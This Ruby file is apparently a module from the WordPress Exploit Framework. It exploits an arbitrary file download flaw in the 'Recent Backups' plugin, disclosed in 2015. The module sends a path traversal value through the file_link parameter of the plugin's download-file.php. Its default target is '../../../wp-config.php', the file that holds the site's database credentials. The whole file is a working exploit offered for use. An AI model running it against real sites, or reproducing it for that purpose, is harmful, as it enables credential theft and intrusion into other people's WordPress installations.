# frozen_string_literal: true

class Wpxf::Auxiliary::RecentBackupsArbitraryFileDownload < Wpxf::Module
  include Wpxf::WordPress::FileDownload

  def initialize
    super

    update_info(
      name: 'Recent Backups Arbitrary File Download',
      author: [
        'Larry W. Cashdollar', # Disclosure
        'rastating'            # WPXF module
      ],
      references: [
        ['WPVDB', '8122'],
        ['EDB', '37752']
      ],
      date: 'Aug 02 2015'
    )
  end

  def check
    check_plugin_version_from_readme('recent-backups')
  end

  def working_directory
    'wp-content/plugins/recent-backups/'
  end

  def default_remote_file_path
    '../../../wp-config.php'
  end

  def download_request_params
    { 'file_link' => remote_file }
  end

  def downloader_url
    normalize_uri(wordpress_url_plugins, 'recent-backups', 'download-file.php')
  end
end
